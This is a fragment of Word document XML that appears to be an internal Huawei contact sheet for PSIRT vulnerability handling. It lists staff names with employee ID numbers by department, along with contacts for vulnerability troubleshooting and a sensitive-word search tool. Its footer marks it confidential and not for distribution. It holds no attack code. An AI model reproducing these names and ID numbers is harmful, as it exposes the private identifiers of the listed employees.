                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pP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2013-中央硬件</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施文超00109740</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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005949A3" w:rsidRDefault="00331826" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pP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2012</w:t>
            </w:r>
            <w:r w:rsidRPr="00C61B7F">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>实验室</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00C61B7F">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>研发能力中心</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钟清莲 00116293</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钟清莲z00116293</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005949A3" w:rsidRDefault="00331826" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pP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2012</w:t>
            </w:r>
            <w:r w:rsidRPr="00C61B7F">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>实验室</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00C61B7F">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>海思</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潘时林 0025603</w:t>
            </w:r>
            <w:r w:rsidRPr="005949A3">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>9</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lastRenderedPageBreak/>
              <w:t>吴开涛w00113138</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005949A3" w:rsidRDefault="00331826" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pP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lastRenderedPageBreak/>
              <w:t>消费者-终端</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石秀凤</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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005949A3" w:rsidRDefault="00331826" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pP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消费者-MBB</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hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>叶小玲</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="259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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005949A3" w:rsidRDefault="00331826" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D3A5F" w:rsidRPr="005949A3" w:rsidTr="001A4267">
        <w:trPr>
          <w:trHeight w:val="285"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="210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color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>2012</w:t>
            </w:r>
            <w:r w:rsidRPr="005949A3">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>实验室</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2123" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:noWrap/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005949A3" w:rsidRDefault="00331826" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="323" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005949A3">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>wangshuyan00285782</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2593" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005949A3" w:rsidRDefault="00331826" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w:rsidR="00331826" w:rsidRPr="005949A3" w:rsidRDefault="00331826" w:rsidP="00303753">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003117D5" w:rsidRDefault="003117D5" w:rsidP="00CF74BE"/>
    <w:p w:rsidR="003117D5" w:rsidRDefault="003117D5" w:rsidP="00206C1E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="003117D5">
        <w:t>PDM</w:t>
      </w:r>
      <w:r w:rsidRPr="003117D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>电子流</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00206C1E" w:rsidRPr="00206C1E" w:rsidRDefault="00206C1E" w:rsidP="00206C1E">
      <w:r w:rsidRPr="003117D5">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>PDM</w:t>
      </w:r>
      <w:r w:rsidRPr="003117D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>电子流问题，请咨询</w:t>
      </w:r>
      <w:r w:rsidRPr="003117D5">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>PSIRT</w:t>
      </w:r>
      <w:r w:rsidRPr="003117D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>，联系人如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblInd w:w="-23" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8565"/>
      </w:tblGrid>
      <w:tr w:rsidR="003117D5" w:rsidRPr="003117D5" w:rsidTr="003117D5">
        <w:trPr>
          <w:trHeight w:val="285"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8636" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B8CCE4"/>
            <w:noWrap/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003117D5" w:rsidRPr="003117D5" w:rsidRDefault="003117D5" w:rsidP="003117D5">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003117D5">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsiaTheme="minorEastAsia" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>PSIRT漏洞处理PDM电子流问题咨询</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003117D5" w:rsidRPr="003117D5" w:rsidTr="003117D5">
        <w:trPr>
          <w:trHeight w:val="285"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="863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117D5" w:rsidRPr="003117D5" w:rsidRDefault="003117D5" w:rsidP="003117D5">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003117D5">
              <w:rPr>
                <w:rFonts w:ascii="timesnewroman" w:hAnsi="timesnewroman" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Wanglijun</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003117D5">
              <w:rPr>
                <w:rFonts w:ascii="timesnewroman" w:hAnsi="timesnewroman" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> 00295131</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003117D5" w:rsidRPr="003117D5" w:rsidTr="003117D5">
        <w:trPr>
          <w:trHeight w:val="285"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="863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117D5" w:rsidRPr="003117D5" w:rsidRDefault="003117D5" w:rsidP="003117D5">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003117D5">
              <w:rPr>
                <w:rFonts w:ascii="timesnewroman" w:hAnsi="timesnewroman" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Zhanliwei</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003117D5">
              <w:rPr>
                <w:rFonts w:ascii="timesnewroman" w:hAnsi="timesnewroman" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> 00104642</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003117D5" w:rsidRPr="003117D5" w:rsidTr="003117D5">
        <w:trPr>
          <w:trHeight w:val="285"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="863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3117D5" w:rsidRPr="003117D5" w:rsidRDefault="003117D5" w:rsidP="003117D5">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003117D5">
              <w:rPr>
                <w:rFonts w:ascii="timesnewroman" w:hAnsi="timesnewroman" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Zhangyan 90004009</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003117D5" w:rsidRPr="003117D5" w:rsidTr="003117D5">
        <w:trPr>
          <w:trHeight w:val="240"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="86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117D5" w:rsidRPr="003117D5" w:rsidRDefault="003117D5" w:rsidP="003117D5">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003117D5">
              <w:rPr>
                <w:rFonts w:ascii="timesnewroman" w:hAnsi="timesnewroman" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Liujingang 90003178</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003117D5" w:rsidRPr="003117D5" w:rsidTr="003117D5">
        <w:trPr>
          <w:trHeight w:val="285"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="863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3117D5" w:rsidRPr="003117D5" w:rsidRDefault="003117D5" w:rsidP="003117D5">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003117D5">
              <w:rPr>
                <w:rFonts w:ascii="timesnewroman" w:hAnsi="timesnewroman" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Kangxinqiang</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003117D5">
              <w:rPr>
                <w:rFonts w:ascii="timesnewroman" w:hAnsi="timesnewroman" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> 00291244</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B4A40" w:rsidRPr="003117D5" w:rsidTr="003117D5">
        <w:trPr>
          <w:trHeight w:val="285"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="863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5B4A40" w:rsidRPr="003117D5" w:rsidRDefault="005B4A40" w:rsidP="003117D5">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="timesnewroman" w:hAnsi="timesnewroman" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B4A40">
              <w:rPr>
                <w:rFonts w:ascii="timesnewroman" w:hAnsi="timesnewroman" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>zhangyanyang</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B4A40">
              <w:rPr>
                <w:rFonts w:ascii="timesnewroman" w:hAnsi="timesnewroman" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> 00234174</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003117D5" w:rsidRDefault="003117D5" w:rsidP="00CF74BE"/>
    <w:p w:rsidR="0064399B" w:rsidRDefault="0064399B" w:rsidP="00CF74BE"/>
    <w:p w:rsidR="00177711" w:rsidRPr="00177711" w:rsidRDefault="0064399B" w:rsidP="0064399B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00177711">
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00177711">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查</w:t>
      </w:r>
      <w:r w:rsidRPr="00177711">
        <w:t>技术专家支持</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177711" w:rsidRDefault="00177711" w:rsidP="00177711">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>漏洞排查过程中有技术问题及漏洞修复问题可咨询安全能力中心，联系人如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064399B" w:rsidRPr="00177711" w:rsidRDefault="0064399B" w:rsidP="00177711">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00177711">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>张淼</w:t>
      </w:r>
      <w:r w:rsidRPr="00177711">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>00102211</w:t>
      </w:r>
      <w:r w:rsidRPr="00177711">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00695F16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00177711">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>李科</w:t>
      </w:r>
      <w:r w:rsidRPr="00177711">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>00316555</w:t>
      </w:r>
      <w:r w:rsidRPr="00177711">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00695F16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00177711">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>余志刚</w:t>
      </w:r>
      <w:r w:rsidRPr="00177711">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 00311016 </w:t>
      </w:r>
      <w:r w:rsidR="00695F16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00177711">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>张扬</w:t>
      </w:r>
      <w:r w:rsidRPr="00177711">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>00291253</w:t>
      </w:r>
      <w:r w:rsidR="00695F16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00695F16" w:rsidRPr="00695F16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>陆晓辉</w:t>
      </w:r>
      <w:r w:rsidR="00695F16" w:rsidRPr="00695F16">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>90003282</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064399B" w:rsidRDefault="0064399B" w:rsidP="00CF74BE"/>
    <w:p w:rsidR="006C0CB4" w:rsidRDefault="006C0CB4" w:rsidP="006C0CB4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>敏感词搜索工具技术支持</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0CB4" w:rsidRPr="006C0CB4" w:rsidRDefault="006C0CB4" w:rsidP="006C0CB4">
      <w:r>
        <w:t>刘皓</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 90006223</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006C0CB4" w:rsidRPr="006C0CB4" w:rsidSect="00542539">
      <w:headerReference w:type="even" r:id="rId27"/>
      <w:headerReference w:type="default" r:id="rId28"/>
      <w:footerReference w:type="even" r:id="rId29"/>
      <w:footerReference w:type="default" r:id="rId30"/>
      <w:headerReference w:type="first" r:id="rId31"/>
      <w:footerReference w:type="first" r:id="rId32"/>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5E5" w:rsidRDefault="005325E5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005325E5" w:rsidRDefault="005325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bookantiqua">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BE8" w:rsidRDefault="00AD6BE8">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AD6BE8">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1760" w:type="pct"/>
        </w:tcPr>
        <w:p w:rsidR="00AD6BE8" w:rsidRDefault="002C2771">
          <w:pPr>
            <w:pStyle w:val="aa"/>
            <w:ind w:firstLine="360"/>
          </w:pPr>
          <w:fldSimple w:instr=" TIME \@ &quot;yyyy-M-d&quot; ">
            <w:r w:rsidR="006D5184">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>2015-7-31</w:t>
            </w:r>
          </w:fldSimple>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1714" w:type="pct"/>
        </w:tcPr>
        <w:p w:rsidR="00AD6BE8" w:rsidRDefault="00AD6BE8">
          <w:pPr>
            <w:pStyle w:val="aa"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>华为保密信息</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>,</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>未经授权禁止扩散</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1527" w:type="pct"/>
        </w:tcPr>
        <w:p w:rsidR="00AD6BE8" w:rsidRDefault="00AD6BE8">
          <w:pPr>
            <w:pStyle w:val="aa"/>
            <w:ind w:firstLine="360"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>第</w:t>
          </w:r>
          <w:fldSimple w:instr="PAGE">
            <w:r w:rsidR="000D3A5F">
